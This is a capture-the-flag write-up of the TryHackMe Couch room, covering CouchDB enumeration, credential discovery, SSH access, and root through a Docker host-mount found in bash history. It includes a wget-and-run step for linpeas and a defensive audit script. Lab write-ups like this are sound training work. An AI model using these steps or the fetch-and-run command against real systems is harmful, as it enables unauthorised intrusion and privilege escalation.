Try Hack Me – Couch CTF Writeup

YouTube!

This is my first writeup with a YouTube video, and it's for the Try Hack Me couch room!

You can watch it here or continue reading below!

The Couch Writeup!

So, I decided on the couch room on Try Hack Me (links at the bottom to the room).

This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….

Brief

The brief has a few additional steps. I identified 3, and if you follow the writeup you will be able to answer all of them. The three I identified were:

  • Find the credentials in the database
  • Identify the User.txt flag
  • Find the Root.txt flag

Starting Out

As always, I started out with an Nmap scan with the following parameters:

nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>

These are the results I got;

So no HTTP site on 80 but CouchDB on 5984, sometimes -p- on nmap is worth it!

Let's have a look at that HTTP site on 5984.

Amazing!

2 options now: I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.

Let's try Gobuster first using the below;

gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt
# if you don't have a big.txt wordlist, you can substitute this for one you have

The results weren’t great……

So, let's amend our Gobuster command to;

gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404
# Gobuster normally filters out 404, but if you use -b you have to put 404 back in there or it won't filter those out too

This looks better;

Use the _utils page and we will see what's in the database;

If you click through secret, you will find the credentials you need for Atena.

Atena and Her SSH

So, let's pretend to be Atena by using the below;

ssh atena@<THM_IP>

Obviously, we’re going to ls to see what Atena has in her home directory…..

When you do this, don’t use the | cut -c -6

The user flag is ours!

Let’s Escalate!

So being Atena was great and all, but we need root!

There’s a couple of options out there, but I decided to upload linpeas and run it.

# Start a webserver in the directory you have linpeas stored, take note of the port
python3 -m http.server

# From the THM Box side
wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

So after letting this run a couple of things stood out to me in addition to what linpeas was marking up;

  • Docker was installed and, while not directly vulnerable, it's not always on a THM Box
  • Bash history was readable by the user

So let's sneakily read Atena’s history

cat .bash_history

There is a lot in there, but that Docker command is interesting, so let's copy it and run it!

Docker

So we are now inside a container.

From here I tried to cd to root with no luck, so instead I tried the following

cd mnt
ls
cd root
ls
cat root.txt

We have it!
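As an added example (not part of the original writeup or the room), here is a defender-side audit for the pattern this section relies on: shell history holding docker run invocations that bind-mount sensitive host paths or use --privileged. The sample history lines and the list of sensitive paths are constructed assumptions, not the commands from the room.

```python
import posixpath
import shlex

VOLUME_FLAGS = {"-v", "--volume", "--mount"}
# Assumed list of host paths that should never be bind-mounted into a container.
SENSITIVE = {"/", "/etc", "/root", "/var/run/docker.sock"}

# Constructed sample history, not the commands from the room.
SAMPLE_HISTORY = """\
ls -la
docker ps
docker run --rm -it -v /:/mnt alpine
docker run -d -v appdata:/var/lib/app --name web nginx
docker run --privileged --mount type=bind,source=/etc,target=/host-etc busybox
"""

def host_source(spec):
    """Return the host path of a bind-mount spec, or None for named/anonymous volumes."""
    if "=" in spec and not spec.startswith("/"):   # --mount key=value,... syntax
        fields = dict(f.split("=", 1) for f in spec.split(",") if "=" in f)
        if fields.get("type", "volume") != "bind":
            return None
        return fields.get("source") or fields.get("src")
    src, sep, _ = spec.partition(":")              # -v host:container[:opts] syntax
    return src if sep and src.startswith("/") else None

def audit_line(line):
    """Return findings for one history line containing a 'docker ... run' command."""
    try:
        tokens = shlex.split(line)
    except ValueError:                             # unbalanced quotes in the history
        tokens = line.split()
    if "docker" not in tokens or "run" not in tokens:
        return []
    findings = []
    for i, tok in enumerate(tokens):
        flag, _, value = tok.partition("=")
        if flag == "--privileged" and value != "false":
            findings.append("privileged container")
        elif flag in VOLUME_FLAGS:
            spec = value or (tokens[i + 1] if i + 1 < len(tokens) else "")
            src = host_source(spec)
            if src and posixpath.normpath(src) in SENSITIVE:
                findings.append(f"host path {posixpath.normpath(src)} bind-mounted")
    return findings

def audit_history(text):
    """Return (line_number, finding) pairs for every flagged line in a history file."""
    return [(n, f) for n, line in enumerate(text.splitlines(), 1) for f in audit_line(line)]
```

Calling audit_history on the contents of a user's .bash_history returns the line numbers to review; any hit means that user's Docker access is effectively root on the host.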

Try Hack Me Couch Conclusion

I did enjoy that box!

Maybe I went round the houses for the privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own, because if it wasn’t that then I'd have been going down a different route.

I hope you enjoyed attempting this room too!

Links

Go to Tryhackme.com for this and many more CTFs

Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!

Contact me – Any suggestions or room requests, get in touch!